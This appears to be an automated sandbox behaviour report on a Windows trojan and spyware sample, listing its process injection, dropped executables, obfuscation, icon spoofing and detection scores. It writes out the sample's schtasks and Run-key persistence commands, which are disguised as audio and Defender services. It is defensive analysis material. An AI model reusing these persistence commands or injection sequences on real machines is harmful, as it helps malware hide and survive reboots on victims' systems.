Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB31D4 NtWow64ReadVirtualMemory64,GetModuleHandleW,GetProcAddress,NtWow64ReadVirtualMemory64,	4_2_00AB31D4
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB3509 GetModuleHandleW,GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,LocalFree,LocalFree,	4_2_00AB3509
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2ED8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,	4_2_00AB2ED8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB2B39 memset,ZwQueryInformationProcess,ReadProcessMemory,	4_2_00AB2B39
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB126D NtQueryVirtualMemory,	4_2_00AB126D
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64CC8 memset,VirtualAllocEx,NtGetContextThread,memcpy,WriteProcessMemory,NtSetContextThread,ResumeThread,Sleep,SuspendThread,GetLastError,	5_2_00C64CC8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64854 memset,ZwQueryInformationProcess,ReadProcessMemory,	5_2_00C64854
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C63450 memset,NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,	5_2_00C63450
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6502C ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,StrRChrA,	5_2_00C6502C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82AC8 GetSystemTimes,NtQuerySystemInformation,	5_2_00C82AC8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C636F8 NtUnmapViewOfSection,RtlNtStatusToDosError,	5_2_00C636F8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6528C NtResumeProcess,RtlNtStatusToDosError,	5_2_00C6528C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C652A4 NtSuspendProcess,RtlNtStatusToDosError,	5_2_00C652A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C636A8 NtMapViewOfSection,RtlNtStatusToDosError,	5_2_00C636A8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82E70 InitializeCriticalSection,GetModuleHandleW,GetProcAddress,GetSystemTimes,NtQuerySystemInformation,HeapAlloc,GetTickCount,	5_2_00C82E70
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C64634 memset,ZwQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,	5_2_00C64634
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C83FCC ZwQueryKey,ZwQueryKey,memcpy,	5_2_00C83FCC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C803EC GetProcessId,lstrlenW,HeapAlloc,HeapFree,HeapAlloc,NtQuerySystemInformation,GetCurrentProcess,DuplicateHandle,NtQueryObject,HeapFree,HeapAlloc,HeapFree,HeapAlloc,NtQueryObject,RtlInitUnicodeString,RtlEqualUnicodeString,NtQueryInformationFile,NtQueryInformationFile,_wcsnicmp,HeapAlloc,CloseHandle,HeapFree,HeapFree,HeapFree,	5_2_00C803EC

PE file contains executable resources (Code or Archives)

Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Sample file is different than original file name gathered from version info

Source: CVbJSUXraQ.exe, 00000001.00000003.691617419.0000000001805000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000001.00000002.943817576.0000000001687000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamej vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameClient.exe4 vs CVbJSUXraQ.exe
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAdobe Download ManagerV vs CVbJSUXraQ.exe

Source: CVbJSUXraQ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File created: C:\Users\user\btpanui

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@33/5@3/3

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E1A06A GetLastError,FormatMessageW,

1_2_00E1A06A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00DB4E89

Source: CVbJSUXraQ.exe	Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe	Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\CVbJSUXraQ.exe

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File created: C:\Users\user\AppData\Local\Temp\vnc.exe

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E13C55 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

1_2_00E13C55

Source: winsock.exe.6.dr, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.0.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.2.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\runas
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{41435A30-AC43-1BEB-BE05-A07FD209D423}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A8AD8678-FDF622E2-FED71C3E8
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0kBRNrRz5TDLEQouI0

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: CVbJSUXraQ.exe

Static file information: File size 2111264 > 1048576

Source: CVbJSUXraQ.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13a800

Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CVbJSUXraQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DD8945 push ecx; ret	1_2_00DD8958
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB103B push ecx; ret	4_2_00AB104B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ABE0BC push ecx; ret	4_2_00ABE0CC
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEAA9 push cs; iretd	4_2_00ADEAB8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEA73 push cs; ret	4_2_00ADEA88
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADE3DD push es; iretd	4_2_00ADE3EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA2D0C push ecx; ret	5_2_00CA2D1C
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F125B2 push esi; ret	6_2_00F125CF
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD8945 push ecx; ret	7_2_00DD8958
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC4257 push edi; ret	7_2_00DC4259
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC426B push edi; ret	7_2_00DC426D
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A068 push 0041A08Eh; ret	7_2_0041A086
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A02C push 0041A05Ch; ret	7_2_0041A054
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E8D0 push 0040E905h; ret	7_2_0040E8FD
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B164 push 0040B190h; ret	7_2_0040B188
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E908 push 0040E94Ah; ret	7_2_0040E942
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B12C push 0040B158h; ret	7_2_0040B150
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C136 push 0040C164h; ret	7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C138 push 0040C164h; ret	7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040813C push 00408174h; ret	7_2_0040816C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004171E8 push 00417214h; ret	7_2_0041720C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EA push 0040CA18h; ret	7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EC push 0040CA18h; ret	7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E1A4 push 0040E1D0h; ret	7_2_0040E1C8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B1B8 push 0040B1E4h; ret	7_2_0040B1DC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25A push 0040E288h; ret	7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25C push 0040E288h; ret	7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00414A28 push 00414A84h; ret	7_2_00414A7C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040BAB8 push 0040BAE4h; ret	7_2_0040BADC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B54 push 00409BC8h; ret	7_2_00409BC0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B78 push 00409BC8h; ret	7_2_00409BC0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

PE file contains an invalid checksum

Source: windef.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: real checksum: 0x110ada should be: 0x208fb2
Source: winsock.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: vnc.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x657b3
Source: CVbJSUXraQ.exe	Static PE information: real checksum: 0x110ada should be: 0x209217
Source: vnc.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x657b3

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (31).png

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49743 -> 8000

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Local\Temp\windef.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\winsock.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	1_2_00DB48D7
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,	5_2_00C83CC0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C8143C IsIconic,GetLastActivePopup,	5_2_00C8143C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C821C8 IsIconic,	5_2_00C821C8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7CDE8 IsIconic,memset,GetWindow,GetWindow,	5_2_00C7CDE8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7B764 GetWindowLongPtrA,IsIconic,	5_2_00C7B764
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	7_2_00DB48D7
